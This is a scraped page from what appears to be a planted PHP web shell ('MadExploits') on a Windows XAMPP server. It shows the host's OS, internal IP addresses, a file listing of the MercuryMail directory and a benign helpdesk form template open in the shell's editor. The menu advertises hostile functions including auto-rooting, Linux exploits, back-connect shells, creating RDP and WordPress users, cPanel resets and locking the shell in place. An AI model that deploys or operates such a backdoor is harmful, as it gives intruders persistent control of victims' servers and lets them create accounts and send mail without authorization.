Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
MercuryMail /
RESOURCE /
[ HOME SHELL ]
Name
Size
Permission
Action
autorplc.pm
20.19
KB
-rw-rw-rw-
basic.pnc
233
B
-rw-rw-rw-
basic.pnc.info
1.15
KB
-rw-rw-rw-
bpanel.txt
15.3
KB
-rw-rw-rw-
daemon.h
35.77
KB
-rw-rw-rw-
daemon.txt
100.31
KB
-rw-rw-rw-
filetype.pm
3.77
KB
-rw-rw-rw-
greeting.txt
2.05
KB
-rw-rw-rw-
helpdesk.pm5
1.42
KB
-rw-rw-rw-
listserv.pm5
1.01
KB
-rw-rw-rw-
mercuryb.htm
2.77
KB
-rw-rw-rw-
mime-map.pm
874
B
-rw-rw-rw-
order32.dll
193.5
KB
-rw-rw-rw-
order32.fff
3.32
KB
-rw-rw-rw-
poppass.dll
19.52
KB
-rw-rw-rw-
poppass.fff
2.89
KB
-rw-rw-rw-
poppass.txt
844
B
-rw-rw-rw-
ppass32.dll
57
KB
-rw-rw-rw-
ppass32.fff
2.91
KB
-rw-rw-rw-
prefix.pm
1.97
KB
-rw-rw-rw-
rasdial.zip
13.04
KB
-rw-rw-rw-
readme.1st
808
B
-rw-rw-rw-
rescom.exe
88
KB
-rwxrwxrwx
rquotes.r
2.23
KB
-rw-rw-rw-
spambust.dat
27.91
KB
-rw-rw-rw-
template.txt
20.43
KB
-rw-rw-rw-
template.zip
3.02
KB
-rw-rw-rw-
transflt.mer
4.73
KB
-rw-rw-rw-
winpmdde.txt
28.17
KB
-rw-rw-rw-
wpm-char.r
1.35
KB
-rw-rw-rw-
wpm-lmtt.r
23.76
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : helpdesk.pm5
Title Helpdesk Request Form # A simple template showing how a helpdesk request form could be # generated as a template. Note the use of a picture to help the # form to stand out, and the use of informational text to assist # the user in filling out the form. # # You will need to modify the value of the "Set to" line below so # that it reflects the real address of your helpdesk staff. picture 0 ~a\hdesk.bmp text 0 Please fill in the information below, and provide a brief description text 0 of your problem. Our helpdesk staff will get back to you promptly. text 0 string v1 "~p" "What is your name?" string v2 "" "What is your phone number?" string v3 "" "Where are you located?" string v4 ";Normal;Informational;Urgent" "Urgency of your problem?" 0 list string v5 "" "(Optional) Response needed by?" string v6 "" "What is your problem or request?" 512 multiline set to = helpdesk set subject = "Helpdesk Request" set confirm-reading = "N" set copyself = "Y" insert "Helpdesk Request~z" insert "----------------~z" insert "~z" insert "From: ~vv1~~z" insert "Date and time: ~y~z" insert "Phone: ~vv2~~z" insert "Location: ~vv3~~z" insert "Urgency: ~vv4~~z" insert "Respond by: ~vv5~~z" insert "~z" insert "Problem description:~z" insert "--------------------~z" insert "~vv6~~z" insert "--------------------~z" insert "~z" insert "End of helpdesk request.~z"
Close